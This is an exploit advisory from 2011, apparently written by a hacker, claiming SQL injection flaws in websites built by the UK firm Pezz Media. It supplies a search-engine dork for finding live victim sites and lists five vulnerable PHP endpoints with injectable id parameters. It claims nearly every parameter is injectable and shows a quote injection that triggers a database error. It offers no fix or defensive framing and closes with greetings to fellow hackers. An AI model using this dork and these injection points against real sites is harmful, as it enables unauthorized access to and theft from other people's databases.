[+] Exploit Title : Pezz Media.. SQL injection Vulnerability
[+] Date : 08 June 2011
[+] Author : k's0uR!
[+] Category : WebApps
[+] d0rk : "Website designed and maintained by Pezz Media, UK "
[+] Faceb00k : http://www.facebook.com/dali.Developpeur
[+] Tested on : Windows Xp SP2
[+] Exploit:
››http://localhost/path/details.php?id={VaLid id }
››http://localhost/path/testimonial.php?id={VaLid id }
››http://localhost/path/testimonials.php?id={VaLid id }
››http://localhost/path/location.php?id={VaLid id }
››http://localhost/path/availability.php?id={VaLid id }
››Check all .php?*= mostly all vul.. to sqli.!
›› use your head..!!
››http://localhost/path/details.php?id=7beecl73d8' » {sql Error} (^_^)
››http://localhost/path/details.php?id=Sql here
[+] Example:
[+]Greetz To : 4ll My friendS ...tunis1an h4ck3rs...++...
[+] Made in tunisia
[+]to be continued...